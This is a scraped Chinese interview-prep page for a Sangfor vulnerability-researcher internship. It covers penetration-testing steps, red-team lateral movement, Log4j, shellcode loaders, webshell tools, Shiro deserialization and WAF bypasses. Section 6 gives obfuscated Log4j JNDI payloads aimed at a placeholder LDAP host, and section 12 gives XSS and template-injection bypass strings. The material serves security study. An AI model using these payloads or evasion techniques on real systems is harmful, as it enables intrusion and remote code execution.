北京城乡建设门户网站,怎样制作网站教程,wordpress区块链模板,wordpreSS 搜索优化网络安全领域各种资源#xff0c;学习文档#xff0c;以及工具分享、前沿信息分享、POC、EXP分享。不定期分享各种好玩的项目及好用的工具#xff0c;欢迎关注。
目录 深信服-漏洞研究员实习
1. 在XX实习时做了什么
2. 渗透测试的思路简单描述
3. 护网中承担什么角色
4… 网络安全领域各种资源学习文档以及工具分享、前沿信息分享、POC、EXP分享。不定期分享各种好玩的项目及好用的工具欢迎关注。
目录 深信服-漏洞研究员实习
1. 在XX实习时做了什么
2. 渗透测试的思路简单描述
3. 护网中承担什么角色
4. 红队一些攻击思路
5. 拿下系统如何横向
6. Log4j漏洞CVE-2021-44228研究
7. 内存码Shellcode Loader了解
8. 冰蝎、哥斯拉工具分析
9. 攻击队研究重点
10. 擅长漏洞/攻击方向
11. Shiro反序列化漏洞解析
12. Bypass方法示例 深某服-漏洞研究员实习 在XX实习时做了什么渗透测试的思路简单描述护网中承担什么角色红队一些攻击思路拿下系统如何横向前段时间的那个log4j有研究吗可以简单说一下吗接上有哪些混淆绕过的方法内存码有没有了解冰蝎、哥斯拉这些工具有没有了解过做攻击队的时候有没有研究过什么攻击比如研究一些工具还是魔改什么的那么多漏洞和攻击比较擅长哪一个说下shiro反序列化的形成原因、利用链对一些bypass的方法有没有了解过什么姿势可以简单介绍一下。 1. 在XX实习时做了什么 在实习期间主要围绕渗透测试、漏洞挖掘和攻防实战展开 渗透测试项目参与内/外部资产的安全评估包括Web应用、API接口和内部系统的漏洞扫描如SQL注入、XSS、逻辑漏洞等。漏洞挖掘与利用针对Java框架Shiro、Fastjson、中间件WebLogic、Tomcat进行代码审计复现历史漏洞并尝试发现新攻击面。红蓝对抗支持协助防守方分析攻击流量溯源攻击链同时模拟攻击队编写PoC工具绕过WAF规则。报告输出整理漏洞复现步骤、风险等级和修复方案推动开发团队修复高危漏洞。 2. 渗透测试的思路简单描述 渗透测试核心流程分五阶段 信息收集 子域名枚举如subfinder、端口扫描nmap、指纹识别Wappalyzer。敏感信息泄露GitHub源码、备份文件、配置文件。 漏洞扫描与验证 工具自动化扫描AWVS、Nessus结合手动验证误报如逻辑漏洞、未授权访问。 权限提升 通过弱口令、反序列化、文件上传等漏洞获取初始立足点。 横向移动 利用内网协议SMB、WinRM、凭证窃取Mimikatz扩大控制范围。 报告输出 输出漏洞详情、攻击路径图及修复建议。 3. 护网中承担什么角色 攻击队角色 突破入口针对暴露面Web应用、VPN、邮件系统进行漏洞利用如Log4j、OA系统RCE。横向渗透通过内网代理如reGeorg和口令爆破Hydra拿下域控或核心数据库。 防守经验 分析攻击流量特征如冰蝎流量加密优化WAF规则协助处置应急事件如Webshell查杀、日志溯源。 4. 红队一些攻击思路 初始入侵阶段 鱼叉攻击钓鱼邮件投递恶意文档CVE-2021-40444或伪装升级包供应链污染。0day/Nday利用针对未修复的高危漏洞快速突破如Confluence RCE。 横向扩展阶段 凭证窃取通过Mimikatz提取内存密码、Kerberoasting攻击获取服务账户哈希。权限维持部署隐蔽后门如计划任务、WMI事件订阅、黄金票据伪造域管权限。 5. 拿下系统如何横向 横向移动关键步骤 信息收集 内网资产扫描Netsparker、Fscan定位高价值目标数据库、域控。 凭证利用 Pass-the-HashNTLM哈希传递、Pass-the-TicketKerberos票据转发。 协议漏洞 利用SMBGhostCVE-2020-0796、ZerologonCVE-2020-1472直接提权。 隐蔽通道 通过DNS隧道dnscat2、HTTP代理Chisel绕过网络隔离。 6. Log4j漏洞CVE-2021-44228研究 原理Log4j 2.x版本解析日志时未对${jndi:ldap://xxx}等表达式过滤导致JNDI注入远程加载恶意类触发RCE。 混淆绕过方法 环境变量注入${${env:XXX:-j}ndi:ldap://xxx}利用默认值覆盖。Lower/Upper关键字${jNdi:ldap://xxx}大小写绕过。嵌套表达式${${::-j}ndi:ldap://xxx}特殊符号替换。绕过高版本限制利用上下文变量如${ctx:xxx}拼接攻击载荷。 7. 内存码Shellcode Loader了解 原理将恶意代码如Cobalt Strike的Beacon直接加载到内存中执行避免文件落地。常见技术 反射型DLL注入通过VirtualAlloc分配内存并执行。进程镂空Process Hollowing替换合法进程内存内容如svchost.exe 。 对抗检测通过加密壳如AES、API调用混淆如Syscall直接调用绕过EDR。 8. 冰蝎、哥斯拉工具分析 冰蝎Behinder 特点动态密钥加密流量AES随机Key支持HTTP/HTTPS隧道。检测难点特征为固定UA头和Content-Type: application/octet-stream。 哥斯拉Godzilla 优势支持更多加密算法如RSA、模块化功能内网穿透、端口扫描。绕过技巧修改默认密钥、自定义HTTP头字段混淆流量。 9. 攻击队研究重点 工具武器化 魔改C2框架如Cobalt Strike Aggressor脚本适配目标环境。开发轻量级漏洞利用工具如Fastjson一键利用。 流量混淆 对Webshell流量进行分段编码如Base64Hex混合、添加垃圾数据。 供应链攻击 研究第三方组件漏洞如npm包、Docker镜像投毒。 10. 擅长漏洞/攻击方向 反序列化漏洞 擅长点Java反序列化链构造如CommonsBeanutils、CC链、内存马注入。实战案例通过Shiro RememberMe字段反序列化打入内网结合JNDI注入加载内存马。 11. Shiro反序列化漏洞解析 形成原因 Shiro使用硬编码AES密钥加密RememberMe字段攻击者通过伪造Cookie触发反序列化。反序列化入口点AbstractRememberMeManager#decrypt方法。 利用链以CommonsBeanutils为例 触发点恶意Cookie → AES解密 → 反序列化 → 调用BeanComparator.compare() 。利用链通过PropertyUtils.getProperty() 触发任意Getter方法最终执行TemplatesImpl加载字节码。 12. Bypass方法示例 常见绕过姿势 编码混淆URL编码、Unicode转义如img srcx onerroralert(1) → \u003cimg\u0020srcx...。关键字分割利用注释符或拼接如svg/onloadalert(1)。协议特性 HTTP参数污染HPPparam1parampayload触发解析差异。特殊符号${11}在Thymeleaf等模板引擎中执行表达式。